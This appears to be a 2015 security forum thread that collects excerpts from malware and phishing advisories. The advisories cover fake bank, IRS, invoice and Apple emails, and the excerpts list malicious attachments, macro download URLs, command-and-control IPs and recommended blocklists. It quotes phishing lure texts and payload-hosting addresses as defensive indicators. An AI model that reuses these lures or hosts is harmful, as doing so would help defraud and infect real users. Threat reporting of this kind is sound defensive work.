CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed...

23 January 2015 : bank_notice2301.zip (12kb): Extracts to: bank_notice2301.scr
Current Virus total detections: 8/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d1d6bcb1e318abc7f8bb92d4eb3da9dd78843fa9bf456ceed0cf7bd666387104/analysis/1422012240/
___

Fake 'IRS Activity' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-irs-fiscal-activity-531065.html
23 Jan 2015 - "This fake IRS spam actually does use the irsuk .co domain to host malware.
From: IRS [support@ irsuk .co]
Date: 23 January 2015 at 11:46
Subject: IRS Fiscal Activity 531065
Hello, [redacted].
We notify you that last year, according to the estimates of tax taxation,
we had a shortage of means.
We ask you to install the special program with new digital certificates,
what to eliminate an error.
To install the program go to the link <redacted>
Thanks
Intrenal Revenue Sevrice...

The ZIP file contains a malicious executable SetupIRS2015.exe which has a VirusTotal detection rate of 8/53*. The irsuk .co site is hosted on 89.108.88.9 (Agava Ltd, Russia). The Malwr report shows it phoning home to garbux .com (78.24.219.6 - TheFirst-RU, Russia)... A look at 89.108.88.9 shows there is only one active website on that IP address (irsuk .co), but the host on the IP identifies itself as ukirsgov .com which is a domain created on the same day (2015-01-19) but has been -suspended- due to invalid WHOIS details (somebody at csc .com), which was hosted on a Bosnian IP of 109.105.193.99 (Team Consulting d.o.o.).That IP is identified as malicious by VirusTotal with a number of bad domains and binaries**. The malware POSTS to garbux .com which Sophos identifies as a characteristic of the generically-named Troj/Agent-ALHF. Overall, automated analysis tools are not very clear about what this malware does... although you can guarantee it is nothing good.
Recommended blocklist:
89.108.88.9
78.24.219.6
109.105.193.99
irsuk .co
garbux .com
ukirsgov .com
updateimage .ru
getimgdcenter .ru
agensiaentrate .it
freeimagehost .ru "
* https://www.virustotal.com/en/file/8dd29cf89a00689ce7221f8b4ab7873784c91555773ad90e509bdf90a68c019d/analysis/1422014166/

** 109.105.193.99: https://www.virustotal.com/en/ip-address/109.105.193.99/information/
___

Fake AMEX SPAM - PDF malware
- http://myonlinesecurity.co.uk/american-express-message-ready-fake-pdf-malware/
23 Jan 2015 - "'Your Message is Ready' pretending to come from American Express <secure.message@ americanexpresss .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and download the malware zip...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Amex-your-message-is-ready.png

When you follow the link you get a page saying "Get file. Your download will start in 5 seconds..." ... which then counts down to zero. You might get the -malware- automatically downloaded or you might have to click-the-direct-link [don't].
23 January 2015: bankline_document_pdf57331.zip (12 kb): Extracts to: bankline_document_pdf34929.exe
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/62a3f1d161c9a52c6283b2e426a1289b160f943b32f337877843bc37100564cc/analysis/1422025963/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.163.217.66: https://www.virustotal.com/en/ip-address/192.163.217.66/information/
___

Fake 'BankLine secure message' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-you-have-received-new.html
23 Jan 2015 - "... these RBS BankLine spam messages are a popular mechanism for the bad guys to spread malware.
From: Bankline [secure.message@ rbs .com .uk]
Date: 23 January 2015 at 12:43
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow:
<redacted>
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly...

The link in the email seems to be somewhat dynamic... The landing page looks like this:
> http://4.bp.blogspot.com/-LLqihSXhTvU/VMJVxFvr-PI/AAAAAAAAGKw/rEq-NZnPuJo/s1600/fake-rbs.jpg
The link on that landing page goes to http ://animation-1 .com/js/jquery-1.41.15.js?get_message which downloads a ZIP file called Bankline_document_pdf71274.zip (or something similar) containing an executable file named something like Bankline_document_pdf24372.exe. The numbers change in each case, and indeed the executable changes slightly every time it is downloaded. The ThreatExpert report shows that it attempt to communicate with the well-known-bad-IP of 202.153.35.133 (Excell Media Pvt Ltd, India) which is associated with the Dyre banking trojan."

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/

:fear: :mad:

AplusWebMaster
2015-01-26, 16:49
FYI...

Fake 'HP Scanned Image' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-hp-digital-device-scanned.html
26 Jan 2015 - "This spam comes with a malicious attachment:
From: HP Digital Device [HP_Printer@ victimdomain .com]
Date: 26 January 2015 at 13:04
Subject: Scanned Image
Please open the attached document.
This document was digitally sent to you using an HP Digital Sending device...
This email has been scanned for viruses and spam...

Attached is a file ScannedImage.zip which contains a malicious executable ScannedImage.scr which has a VirusTotal detection rate of 5/56*..."
* https://www.virustotal.com/en/file/022106d84bc29aa99d5730d5be1dfcd4d03e28ebd9f6a8965c7efab258494cbd/analysis/1422279206/

- http://myonlinesecurity.co.uk/scanned-image-fake-pdf-malware/
26 Jan 2015
> https://www.virustotal.com/en/file/022106d84bc29aa99d5730d5be1dfcd4d03e28ebd9f6a8965c7efab258494cbd/analysis/1422279206/
___

Fake 'Berendsen Invoice" SPAM – doc malware
- http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60020918-117-word-doc-malware/
26 Jan 2015 - "'Berendsen UK Ltd Invoice 60020918 117' pretending to come from donotreply@berendsen.co.uk with -a malicious word doc attachment- is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Sir/Madam, Please find attached your invoice dated 1st January. All queries should be directed to your branch that provides the service. This detail can be found on your invoice. Thank you...

26 January 2015: IRN001526_60020918_I_01_01.DOC (39 kb)
Current Virus total detections: 0/55* | IRN001526_60020918_I_01_01.DOC (34kb) 0/56**
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/17b2a838cf97a51a957b4fdac872da5275099eafe51d9ef36e4ccd0807863cd6/analysis/1422258625/

** https://www.virustotal.com/en/file/0425efe9926a2224ab2116142b769e924252320194a347f52d0800c6005caeec/analysis/1422258320/

- http://blog.dynamoo.com/2015/01/malware-spam-berendsen-uk-ltd-invoice.html
26 Jan 2015
> https://www.virustotal.com/en/file/f0b5ff9d89abfff25e71cc6b917d3c91d72a118d2b31174564b6e026da6b9846/analysis/1422262884/

- http://blog.mxlab.eu/2015/01/26/email-berendsen-uk-ltd-invoice-60020918-117-contains-malicious-word-attachment/
Jan 26, 2015
> https://www.virustotal.com/en/file/f0b5ff9d89abfff25e71cc6b917d3c91d72a118d2b31174564b6e026da6b9846/analysis/1422262884/
___

Fake 'CardsOnLine natwesti' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-cardsonlinenatwesticom.html
26 Jan 2015 - "This -fake- NatWest email leads to malware:
From: CardsOnLine [CardsOnLine@ natwesti .com]
Date: 26 January 2015 at 13:06
Subject: Cards OnLine E-Statement E-Mail Notification
Body:
Dear Customer
Your July 30, 2014 E-Statement for account number xxxxxxxxxxxx6956 from Cards OnLine is now available.
For more information please check link: <redacted>
Thank you
Cards OnLine

... Users have recently been targeted through -bogus- E-Mails by fraudsters claiming to be from their bank. These E-Mails ask customers to provide their internet banking security details in order to reactivate their account or verify an E-Mail address. Please be on your guard against E-Mails that request any of your security details... Users who click-the-link see a download page similar to this:
> https://4.bp.blogspot.com/-a7BgUdoOpJM/VMZTVvYZRHI/AAAAAAAAGLE/f3cZqKKwrpA/s1600/natwest-download.png
The link in the email downloads a randomly-named file in the format security_notice55838.zip which contains a malicious binary which will have a name similar to security_notice18074.exe. This binary has a VirusTotal detection rate of 1/56* and is identified by Norman AV as Upatre..."
* https://www.virustotal.com/en/file/87c96a40af60b3f4d99bf6c2c261a4cdcfce6c46b682c49acce4ca424190aa2c/analysis/1422281915/
___

Fake 'Sage Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/sage-re-invoice-9836956-fake-pdf-malware/
26 Jan 2015 - "'RE: Invoice #9836956' pretending to come from Sage .co .uk <no-reply@ sage .co .uk>
[random invoice numbers] with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please remit BACs before 26/01/2015. The document attached.

The malware attached to this email is exactly the same as in today’s Scanned Image – fake PDF malware*.
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/scanned-image-fake-pdf-malware/

:fear: :mad:

AplusWebMaster
2015-01-27, 17:38
FYI...

Whatsapp leads to Fake Flash update – malware
- http://myonlinesecurity.co.uk/whatsapp-notification-leading-fake-flashplayer-update-malware/
27 Jan 2015 - "An email pretending to come from somebody you know that appears to be a Whatsapp notification is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/whatsapp_flash_update1-262x300.png

When you press the play button in the email, you get sent to a page looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/whatsapp_flash_update2-1024x739.png
... if you select the 'upgrade now' button you end up with a fake flash player update and a badly infected computer...
27 January 2015: adobe_flash_player_update.exe . Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/78ddffc79c02331fd229c563e0a442bb018716f6d86bbf96c41518daa64a2ac6/analysis/1422376705/
___

Fake 'invoice' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-eileen-meade-r-kern.html
27 Jan 2015 - "Kern Engineering & Mfg Corp. is a wholly legitimate firm, they are not sending out this spam nor have their systems been compromised in any way. Instead, this is a -forgery- which has a malicious Word document attached.
From: Eileen Meade [eileenmeade@ kerneng .com]
date: 27 January 2015 at 08:25
subject: inv.# 35261
Here is your invoice & Credit Card Receipt.
Eileen Meade
R. Kern Engineering & Mfg Corp.
Accounting
909) 664-2442
Fax 909) 664-2116

So far, I have seen two different version of the Word document, both poorly detected [1] [2] containing two different macros... These attempt to download a binary from one of the following locations:
http ://UKR-TECHTRAININGDOMAIN .COM/js/bin.exe
http ://schreinerei-ismer.homepage.t-online .de/js/bin.exe
This is saved as %TEMP%\sdfsdferfwe.exe. It has a VirusTotal detection rate of 3/57*..."
1] https://www.virustotal.com/en/file/7eee6bc6e3f310ffac3dc043b6d17ae7b0001693737a0fe1fc124eeb7695622d/analysis/1422351101/

2] https://www.virustotal.com/en/file/2ee6e22de91581fe5dd93407be7207f746c3c6ae52264065c3a344d61e4d0f2d/analysis/1422351116/

* https://www.virustotal.com/en/file/23bbf7b1407bb9e657160f0545facc1d2634d5ba55d67bfaef3685194aa66ec1/analysis/1422351532/


- http://myonlinesecurity.co.uk/eileen-meade-kern-engineering-inv-87049-word-doc-malware/
27 Jan 2015
> https://www.virustotal.com/en/file/7eee6bc6e3f310ffac3dc043b6d17ae7b0001693737a0fe1fc124eeb7695622d/analysis/1422350612/

> https://www.virustotal.com/en/file/2ee6e22de91581fe5dd93407be7207f746c3c6ae52264065c3a344d61e4d0f2d/analysis/1422350713/

- http://blog.mxlab.eu/2015/01/27/fake-email-from-r-kern-engineering-inv-57949-contains-malicious-word-document/
Jan 27, 2015
> https://www.virustotal.com/en/file/23bbf7b1407bb9e657160f0545facc1d2634d5ba55d67bfaef3685194aa66ec1/analysis/1422351532/

216.251.43.17: https://www.virustotal.com/en/ip-address/216.251.43.17/information/

80.150.6.138: https://www.virustotal.com/en/ip-address/80.150.6.138/information/

:fear: :mad:

AplusWebMaster
2015-01-28, 14:24
FYI...

Fake 'invoice' SPAM - doc malware
- http://myonlinesecurity.co.uk/windsor-flowers-invoice-1385-word-doc-malware/
28 Jan 2015 - "'Windsor Flowers Invoice 1385' pretending to come from Windsor Flowers Accounts <windsorflowersaccounts@ hotmail .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has what appears to be a genuine word doc attached which is malformed and contains a macro script virus... The email looks like:
Dear Accounts payable
Please see attached invoice 1385 for flowers within January 15.
Our bank details can be found at the bottom of the invoice.
If paying via transfer please reference our invoice number.
If you have any queries, please do not hesitate to contact me.
Many thanks in advance
Connie
Windsor Flowers
74 Leadenhall Market
London
EC3 V1LT
Tel: 020 7606 4277...

28 January 23015: Windsor Flowers Invoice 1385 Sheet1.doc (2 different versions)
Current Virus total detections: (76kb) 3/57* | (84 kb) 3/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/29e3cf6745741414e3249c10a60f146a0f7dc8776b77fb1c18a8cd71233bdfcf/analysis/1422442083/

** https://www.virustotal.com/en/file/0dc4f465af070ed0e15c1ab5932956fa8542688bb4e0de37b6efdc32b63cf8b1/analysis/1422443094/
___

Fake 'RBS' SPAM - pdf-malware
- http://myonlinesecurity.co.uk/rbs-morning-commentary-fake-pdf-malware-2/
28 Jan 2015 - "'RBS Morning commentary' pretending to come from RBS .COM <no-replay@ rbs .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please refer to the details below if you are having problems reading the attached file.
Please do not contact your Treasury Centre for technical issues – these should be routed to RBS FM support.The attached file is in zip format; first you have to unzip it (self-extracting archive, Adobe PDF) and then it can be viewed in Adobe Acrobat Reader 3.0 or above. If you do not have a copy of the software please contact your technical support department...

All the attachment numbers are random but all extract to same -malware- payload.
28 January 2015: attachment3532715.zip: Extracts to: attachment.exe
Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fdb5ee90aacbac3fcde716adfc837f96d0f12f85d9a5ffd9f60eea6f66376b00/analysis/1422448752/
... Behavioural information
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___

xHamster involved in large Malvertising campaign ...
- https://blog.malwarebytes.org/exploits-2/2015/01/top-adult-site-xhamster-involved-in-large-malvertising-campaign/
Jan 27, 2015 - "... a particular large malvertising campaign in progress from popular adult site xhamster[.]com, a site that boasts half a billion visits a month. In the past two days we have noted a 1500% increase in infections starting from xHamster. Contrary to the majority of drive-by download attacks which use an exploit kit, this one is very simple and yet effective by embedding landing page and exploit within a rogue ad network... The URL linked to is a simplified landing page hosted by what looks like a rogue ad network. The landing simply consists of preparing for a Flash Player exploit... the Flash exploit itself (0 detection on VT*), again hosted on the same ad network. Depending on your version of Flash you may get the recent 0-day:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/flash-300x262.png
Upon successful exploitation, a malicious payload (Bedep) VT 2/57**, is downloaded from:
hxxp ://nertafopadertam .com/2/showthread.php
What we see post exploitation is ad fraud as described here***... While malvertising on xHamster is nothing new, this particular campaign is extremely active. Given that this adult site generates a lot of traffic, the number of infections is going to be huge."
* https://www.virustotal.com/en/file/b0cb277928be3a1072d6c05c7ab6386f2e0c836d51f71cfefeae8f061bdf1ee8/analysis/1422391909/

** https://www.virustotal.com/en/file/00ce05a515ac0c081636712979b6c04b02b3089cc3e3a2af2554a6ff62330f85/analysis/1422393597/

*** https://blog.malwarebytes.org/exploits-2/2015/01/new-adobe-flash-zero-day-found-in-the-wild/

:fear: :mad:

AplusWebMaster
2015-01-29, 15:56
FYI...

Fake 'Invoice' SPAM - doc malware
- http://myonlinesecurity.co.uk/invoice-10413-spotless-cleaning-word-doc-malware/
29 Jan 2015 - "'Invoice #10413 from SPOTLESS CLEANING pretending to come from paulamatos@ btinternet .com with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This message contains Invoice #10413 from SPOTLESS CLEANING. If you have questions about the contents of this message or Invoice, please contact SPOTLESS CLEANING.
SPOTLESS CLEANING
GLYNDEL HOUSE
BOWER LANE
DA4 0AJ
07956 379907

29 January 2015 : SPOTLESS CLEANING-Invoice-10413.doc - Current Virus total detections: 0/57*
... this malicious word doc with macros downloads from www .otmoorelectrical .co.uk/js/bin.exe which is saved as %temp%\hDnyDA.exe (dridex banking Trojan) which has a current detection rate of 2/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f1b3df8dde1b7336810c70898546b76afe5b2ba4af247ce33f6296ca06db45e0/analysis/1422523082/

** https://www.virustotal.com/en/file/6f738e8f6cd3a6abba6168a0046288690f4ee6aa778fbe202a3eac458168ceea/analysis/1422531540/
___

Fake 'BACS Transfer' SPAM - doc malware
- http://myonlinesecurity.co.uk/garth-hutchison-bacs-transfer-remittance-jsag400gbp-word-doc-malware/
29 Jan 2015 - "'Garth Hutchison BACS Transfer : Remittance for JSAG400GBP' pretending to come from Garth Hutchison <accmng2556@ blumenthal .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.

29 January 2015 : BACS_transfer_JS87123781237.doc - Current Virus total detections: 0/57*
... same malware payload as today’s Invoice #10413 from SPOTLESS CLEANING – Word doc malware** ..."
* https://www.virustotal.com/en/file/f1b3df8dde1b7336810c70898546b76afe5b2ba4af247ce33f6296ca06db45e0/analysis/1422524523/

** http://myonlinesecurity.co.uk/invoice-10413-spotless-cleaning-word-doc-malware/
___

Swiss users inundated with malware-laden SPAM
- http://net-security.org/malware_news.php?id=2950
29.01.2015 - "Swiss users are being heavily targeted by a number of spam campaigns delivering the Tiny Banker (TinBa or Busy) e-banking Trojan. Starting with Tuesday, the spammy emails seem to come from email addresses opened with big Swiss free email service providers (bluewin .ch, gmx .ch) and Swiss telecom provider Orange (orange .ch), but actually originate from broadband lines located all over the world. They masquerade as emails containing images sent from iPhones, an MMS sent to the user by Orange, and an application for a job position:
> http://www.net-security.org/images/articles/swiss-spam-29012015.jpg
Unfortunately for those who fall for these tricks, the attached ZIP files contain only malware. "While most of the Tinba versions I usually come across of are utilising a Domain Generation Algorithm (DGA) to calculate the current botnet C&C domain, the version of Tinba that has been spread in Switzerland since yesterday is using hard-coded botnet C&C domains," noted Swiss security activist Raymond Hussy*. Further investigation revealed that all the sending IP addresses are Cutwail infected IPs, and the malware tries to contact four distinct C&C servers, two of which have already been sinkholed. Hussy recommends to network administrators to block traffic to and from the remaining two active domains (serfanteg .ru, midnightadvantage .ru) and the following IPs: 91.220.131.216 and 91.220.131.61. "In general, 91.220.131.0/24 looks quite suspect. So you may want to block the whole netblock," he pointed out, adding that it would also be a good idea to block filenames with multiple file extentions on their email gateway."
* https://www.abuse.ch/?p=9095

91.220.131.61: https://www.virustotal.com/en/ip-address/91.220.131.61/information/

91.220.131.216: https://www.virustotal.com/en/ip-address/91.220.131.216/information/

:fear: :mad:

AplusWebMaster
2015-01-30, 14:59
FYI...

Fake 'BACS Transfer' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-bacs-transfer-remittance.html
30 Jan 2015 - "So far I have only seen one sample of this..
From "Garth Hutchison"
Date 21/01/2015 11:50
Subject BACS Transfer : Remittance for JSAG400GBP
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.

Attached is a malicious Word document BACS_transfer_JS87123781237.doc [VT 1/57*] which contains a macro... which downloads a file from:
http ://stylishseychelles .com/js/bin.exe
This is then saved as %TEMP%\iHGdsf.exe. This has a VirusTotal detection rate of 6/57** identifying it as a Dridex download... Sources indicate that this malware phones home to the following IPs which I recommend you block:
92.63.88.108
143.107.17.183
5.39.99.18
136.243.237.218 "
* https://www.virustotal.com/en/file/901652283bd26716f3d5d2d6f4d032e0d942302877c51529e101a5a53c631de7/analysis/1422618493/

** https://www.virustotal.com/en/file/32b8d7069dae180e0f2666301384411243256d9abc681f897eb67bf0fd6e6406/analysis/1422618468/
___

Fake BBB SPAM - PDF malware
- http://myonlinesecurity.co.uk/bbb-sbq-form-2508ref61-959-0-4-fake-pdf-malware/
30 Jan 2015 - "'BBB SBQ Form #2508(Ref#61-959-0-4)' pretending to come from Admin <no-replay@ bbbl .org> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/BBB.png

30 January 2015: SBQForm-57675.zip ( 13kb) : Extracts to: doc-PDF.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/027d6621ed2c127a311006f17edeacabaf6dd2abefa3d1078e6e140403192a1f/analysis/1422628270/
... Behavioural information
TCP connections
46.165.223.77: https://www.virustotal.com/en/ip-address/46.165.223.77/information/
31.170.162.203: https://www.virustotal.com/en/ip-address/31.170.162.203/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
208.91.197.54: https://www.virustotal.com/en/ip-address/208.91.197.54/information/
208.97.25.20: https://www.virustotal.com/en/ip-address/208.97.25.20/information/
___

Fake 'RE-CONFIRM' SPAM - malware
- http://myonlinesecurity.co.uk/re-confirm-p-oxx1ll112-malware/
30 Jan 2015 - "'RE-CONFIRM P.O©{XX1ll112}' pretending to come from sensaire@ emirates .net .ae with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/RE-CONFIRM-P.O%C2%A9XX1ll112.png

30 January 2015: Purchase order(1).zip: Extracts to: Purchase order.exe
Current Virus total detections: 12/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper file with an icon saying A instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8e60c22f0f013b03db8f65d29b2321f74bdf9300fbadcbf3f730556ad95c6255/analysis/1422633004/
___

Fake 'Apple Termination' – Phish ...
- http://myonlinesecurity.co.uk/apple-termination-phishing/
30 Jan 2015 - "'Apple Termination' pretending to come from Apple Account <support@ apple-messages .com> is one of the latest -phish- attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Apple-Termination.png

If you follow the link you see a webpage looking like with a pre-filled in box with your email address in it:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID.png
When you fill in your user name and password you get a page looking like this ( split into sections), where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID_3.png
... these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___

Fake 'Tesco Bank' – Phish ...
- http://myonlinesecurity.co.uk/latest-estatement-ready-tesco-bank-phishing/
30 Jan 2015 - "'Latest estatement is ready – Tesco Bank' pretending to come from savings@ tescobank .com <pol@ tesco .com> is one of the latest -phish- attempts to steal your Tesco bank Account and your other personal details. This one only wants your personal details, Tesco log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... a website that looks at first glance like the genuine Tesco bank website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email.
Certain restriction has been placed on your tesco bank online services
View your eDocument attached to proceed
Tesco Bank is a retail bank in the United Kingdom which was formed in 1997,
and which has been wholly owned by Tesco PLC since 2008
©Tesco Personal Finance plc 2014 / ©Tesco Personal Finance Compare Limited 2014.

If you open the attached html form you see this message:
Your Latest Tesco Bank Saving Account Statement is ready.
Certain restriction has been placed on your tesco bank online service
You would be required to re – activate your online banking access to proceed
Activate Your Online Access

If you follow that link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

:fear::fear: :mad:

AplusWebMaster
2015-01-31, 19:51
FYI...

Super Bowl Phishing -and- SPAM ...
- https://isc.sans.edu/diary.html?storyid=19261
2015-01-31 - "Beware of Super Bowl spam that may come to your email inbox this weekend. The big game is Sunday and the spam and phishing emails are -pouring- in complete with helpful -links- back-ended by malware and/or credential harvesting:
> https://isc.sans.edu/diaryimages/images/superbowl.PNG
... worth a reminder to friends and family if they see any emails about the Super Bowl that appears to be too-good-to-be-true - delete it..."

:fear::fear:

AplusWebMaster
2015-02-02, 19:30
FYI...

Fake 'Facebook Account' SPAM - PDF malware
- http://myonlinesecurity.co.uk/facebook-account-suspended-fake-pdf-malware/
2 Feb 2015 - "'Facebook Account Suspended' pretending to come from Facebook <noreply@ mail .fb .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and follow the link and run the downloaded file... Google seems to be -ignoring- the report to take down this url so far today or are far too busy complaining about Microsoft and other program makers not issuing patches inside the 90 day time period that Google insist on, to do something really useful in actually protecting users from malware like this one... The email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/facebook-account-suspended.png

2 February 2015 : TermsPolicies.pdf.exe - Current Virus total detections: 11/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9af89f66fb76b016dcf0ab984c35b3948f0f04e828509c083637a8498d3e81dc/analysis/1422881129/
___

Fake 'Your Apple ID' - Phish ...
- http://myonlinesecurity.co.uk/apple-idwas-used-restore-device-one-icloud-backups-phishing/
2 Feb 2015 - "'Your Apple ID,was used to restore a device from one of your iCloud backups' pretending to come from Apple iTunes <orders@ tunes .co .uk> is one of the latest phish attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... The original email looks like this It will NEVER be a genuine email from Apple or any other company so don’t ever click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine Apple website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email. This one has a short url link ( https ://tr .im/JxUNR) in the email which -redirects- you... When you fill in your user name and password you get a page looking very similar to this one ( split into sections), where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
(Screenshots available at the myonlinesecurity URL at the top of this post.)
___

Facebook porn video trojan affects 110K users in 2 days
- http://www.theinquirer.net/inquirer/news/2393198/facebook-porn-video-trojan-affects-110-000-users-in-two-days
